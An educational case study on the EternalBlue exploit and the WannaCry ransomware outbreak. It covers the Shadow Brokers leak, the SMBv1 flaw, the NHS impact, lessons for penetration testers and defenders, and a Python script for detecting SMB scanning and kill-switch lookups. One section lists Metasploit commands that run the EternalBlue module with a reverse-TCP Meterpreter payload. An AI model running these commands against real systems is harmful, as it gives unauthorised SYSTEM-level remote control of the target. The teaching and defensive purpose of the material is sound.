Case Study 12.1: EternalBlue and WannaCry — How an NSA Exploit Became Global Ransomware

Overview

On May 12, 2017, the WannaCry ransomware attack swept across the globe in a matter of hours, infecting over 230,000 computers in 150 countries. Hospitals turned away patients, factories halted production, and government agencies went offline. The attack caused an estimated $4-8 billion in damages worldwide. At its heart was EternalBlue, a sophisticated exploit developed by the United States National Security Agency (NSA) that had been stolen and leaked by a group calling themselves the Shadow Brokers.

The WannaCry incident is a masterclass in understanding exploitation—how vulnerabilities are discovered, weaponized, leaked, and ultimately deployed at scale. For ethical hackers, it illustrates both the devastating power of exploitation tools and the critical importance of timely patching.

Background: The Shadow Brokers and the NSA

The NSA's Tailored Access Operations

The NSA's Tailored Access Operations (TAO) unit, now known as Computer Network Operations, is the U.S. government's elite hacking group. TAO develops and stockpiles zero-day exploits—vulnerabilities unknown to the software vendor—for use in intelligence operations. Among their arsenal was a collection of exploits targeting Microsoft Windows' SMB (Server Message Block) protocol, code-named EternalBlue, EternalRomance, EternalSynergy, and EternalChampion.

EternalBlue specifically targeted a vulnerability in the SMBv1 protocol (CVE-2017-0144). The flaw existed in how Windows handled certain SMB transaction requests. By sending specially crafted packets, an attacker could trigger a buffer overflow in the Windows kernel, gaining SYSTEM-level code execution on the target. The exploit was remarkable for its reliability across multiple Windows versions and its ability to achieve code execution with no authentication required.

The Shadow Brokers Leak

On August 13, 2016, a group calling themselves the Shadow Brokers began leaking NSA hacking tools. After several months of attempted auctions and partial releases, on April 14, 2017, they released their most devastating dump: a collection of Windows exploits from TAO, including EternalBlue.

The timing raised immediate concerns. Microsoft had released security bulletin MS17-010 on March 14, 2017—exactly one month before the leak—patching the vulnerability. This led to widespread speculation that Microsoft had been tipped off about the impending release. However, many organizations had not yet applied the patch, leaving millions of systems vulnerable.

The Vulnerability in Detail

The EternalBlue exploit targets a flaw in the SMBv1 protocol's handling of Transaction 2 (Trans2) requests. Specifically:

  1. The vulnerability exists in the SrvOs2FeaListSizeToNt() function in the Windows SMB server driver (srv.sys).
  2. When processing an SMB_COM_TRANSACTION2 request with specific subcommands, the function incorrectly calculates the size of a converted data structure.
  3. An attacker can craft a request that causes a buffer overflow in the Windows kernel's non-paged pool.
  4. By carefully controlling the overflow data, the attacker corrupts adjacent pool allocations and gains arbitrary code execution in kernel mode.

The exploit carries an "Average" reliability ranking in Metasploit because kernel pool corruption can occasionally cause a Blue Screen of Death (BSOD) if the memory layout does not line up as expected. The exploit developers at TAO nevertheless made it remarkably reliable through careful pool (heap) grooming techniques.

The WannaCry Attack

The Malware

WannaCry (also known as WannaCrypt, WCry, or Wana Decrypt0r) was a ransomware worm that combined the EternalBlue exploit with a ransomware payload. Its key components:

  • EternalBlue exploit module — Used to gain initial code execution on vulnerable systems
  • DoublePulsar backdoor installer — A secondary NSA tool used to inject the payload into the target's memory
  • Ransomware payload — Encrypted user files with AES-128 and RSA-2048, demanding $300-600 in Bitcoin for decryption
  • Worm propagation — After encrypting files, the malware scanned for additional vulnerable hosts on the local network and across the internet, spreading automatically

Timeline of the Attack

May 12, 2017, 07:44 UTC — First infections detected. WannaCry begins spreading rapidly, primarily through organizations with large numbers of unpatched Windows systems.

08:00-12:00 UTC — The UK's National Health Service (NHS) is severely impacted. 80 NHS trusts (approximately one-third of all trusts in England) are affected. Hospitals divert ambulances, cancel surgeries, and revert to paper records. Some hospitals post signs telling patients not to come to the emergency department unless absolutely necessary.

12:00-18:00 UTC — The attack spreads globally. Telefonica in Spain, Deutsche Bahn in Germany, FedEx in the United States, and Renault in France all report infections. Russia's Interior Ministry, China's universities, and India's police are hit.

15:00 UTC — Marcus Hutchins, a 22-year-old British security researcher operating under the alias MalwareTech, discovers that WannaCry checks for the existence of a specific domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com) before executing. If the domain resolves, the malware stops. Hutchins registers the domain for $10.69, inadvertently activating a "kill switch" that halts the spread of new infections.

May 13-14, 2017 — Modified variants without the kill switch appear but spread less effectively. The initial wave's damage is largely done.

Impact on Healthcare

The NHS impact was particularly devastating:

  • 6,912 appointments cancelled, including 139 cancer referrals
  • 595 GP practices affected
  • Five hospitals diverted ambulances to other facilities
  • Patients with life-threatening conditions were transferred
  • Some trusts took weeks to fully recover
  • Total estimated cost to the NHS: £92 million ($120 million)

The NHS was disproportionately affected because:

  • Many systems still ran Windows XP, which was no longer receiving security updates
  • The MS17-010 patch had not been deployed across the organization
  • Network segmentation was inadequate, allowing the worm to spread freely
  • Many medical devices ran embedded Windows versions that could not be easily patched

Lessons for Ethical Hackers

1. Exploitation Impact Demonstration

EternalBlue remains one of the most powerful demonstration exploits because it achieves unauthenticated SYSTEM-level access on unpatched systems. When you find the MS17-010 vulnerability during a penetration test (and in 2026, this still happens—legacy systems, medical devices, and isolated networks often remain unpatched), you can demonstrate the complete attack chain:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS <target>
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > exploit

The resulting SYSTEM-level Meterpreter session demonstrates the maximum impact: full system control, credential extraction, lateral movement capability, and access to all local data.

2. The Patching Imperative

WannaCry's global spread was entirely preventable. Microsoft released the patch two months before the attack. Organizations that had applied MS17-010 were immune. This is the single most important lesson: timely patching is the most effective defense against known exploits.

As penetration testers, when we find unpatched systems, our reports must convey not just the technical vulnerability but the business impact—using WannaCry as a reference point that executives understand.

3. Network Segmentation Matters

WannaCry spread laterally because networks were flat—a single infected workstation could scan and infect every vulnerable system on the network. Proper segmentation would have contained the damage.

In the MedSecure scenario, if the clinical VLAN, administrative VLAN, and server VLAN are properly segmented with strict firewall rules, an EternalBlue infection on one segment cannot spread to others.

4. Legacy System Risk

The NHS's Windows XP systems represented a massive risk that had been documented in audit after audit but never adequately addressed. Ethical hackers must specifically identify and report legacy operating systems, even if no specific exploit is demonstrated against them—their presence represents systemic risk.

Blue Team Takeaways

🔵 Blue Team Perspective:

  • Patch management is the primary defense against known exploits. Implement a patch management program with SLAs: critical patches within 72 hours, high within 2 weeks.
  • Disable SMBv1 on all systems where it is not absolutely required. SMBv1 is a legacy protocol from 1983 and should not be running on modern networks.
  • Network segmentation limits blast radius. Implement microsegmentation between workstations, servers, and critical infrastructure.
  • Endpoint Detection and Response (EDR) can detect exploitation attempts even before patches are available, through behavioral analysis.
  • Backup and recovery procedures must be tested regularly. Organizations that could restore from backups recovered from WannaCry quickly; those without backups faced permanent data loss.
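The behavioral detection point above, together with the worm propagation and kill-switch behavior described earlier in the case study, can be illustrated with ordinary firewall and DNS logs. The following Python script is an added example, not code from the original case study: it flags any source that contacts ten or more distinct hosts on TCP/445 within a minute (the scan-and-spread fan-out a flat network lets WannaCry perform) and lists clients that looked up the kill-switch domain. The log formats, addresses, timestamps and threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Kill-switch domain quoted in the case study; a lookup of it is a high-confidence WannaCry indicator.
KILL_SWITCH_DOMAIN = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"

def constructed_firewall_events():
    """Constructed sample connections as (timestamp, src, dst, dport) tuples."""
    t0 = datetime(2017, 5, 12, 7, 44, 0)
    # An infected workstation sweeping its /24 on TCP/445, one new host per second.
    events = [(t0 + timedelta(seconds=i), "10.20.5.17", f"10.20.5.{20 + i}", 445) for i in range(40)]
    # Many clients talking to one file server (many sources, one destination) must not alert.
    events += [(t0 + timedelta(seconds=i), f"10.20.6.{10 + i}", "10.20.6.5", 445) for i in range(15)]
    # A normal workstation touching three shares over several minutes stays under the threshold.
    events += [(t0 + timedelta(minutes=i), "10.20.5.40", f"10.20.6.{5 + i % 3}", 445) for i in range(6)]
    return events

def detect_smb_fanout(events, threshold=10, window=timedelta(seconds=60)):
    """Map sources reaching >= threshold distinct TCP/445 hosts in a sliding window to their peak count."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in events:
        if dport == 445:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, conns in by_src.items():
        conns.sort()
        start = 0
        for end in range(len(conns)):
            while conns[end][0] - conns[start][0] > window:  # drop connections older than the window
                start += 1
            distinct = {dst for _, dst in conns[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts

# Constructed DNS query log, one "timestamp client queried-name" record per line.
DNS_LOG = """\
2017-05-12T07:43:58 10.20.5.17 iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2017-05-12T07:50:00 10.20.5.40 update.example.com
2017-05-12T07:51:12 10.20.5.22 IUQERFSODP9IFJAPOSDFJHGOSURIJFAEWRWERGWEA.COM.
"""

def detect_kill_switch_queries(log_text):
    """Return (timestamp, client) for every lookup of the kill-switch domain (case and trailing-dot tolerant)."""
    hits = []
    for line in log_text.splitlines():
        ts, client, name = line.split()
        if name.lower().rstrip(".") == KILL_SWITCH_DOMAIN:
            hits.append((ts, client))
    return hits
```

Alert on the kill-switch lookup rather than blocking it: the malware only halts when the domain resolves and the connection succeeds, so a proxy or DNS block that makes the check fail lets the encryption routine run.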

Discussion Questions

  1. Should intelligence agencies stockpile zero-day exploits, given the risk that they may be stolen and weaponized? What is the ethical framework for this decision?

  2. The kill switch domain was a single point of failure in WannaCry's design. What does this tell us about the sophistication of the malware authors? How might future ransomware avoid such weaknesses?

  3. If you discovered during a MedSecure penetration test that 15% of their systems were vulnerable to EternalBlue in 2026, how would you communicate the urgency to non-technical executives?

  4. Marcus Hutchins registered the kill switch domain without fully understanding its purpose. He later faced legal issues for unrelated malware development. How does this case illustrate the complex ethics of security research?

  5. The NHS had been warned repeatedly about the risk of running Windows XP. Why do organizations fail to act on known risks, and how can penetration testers' reports be more effective at driving change?
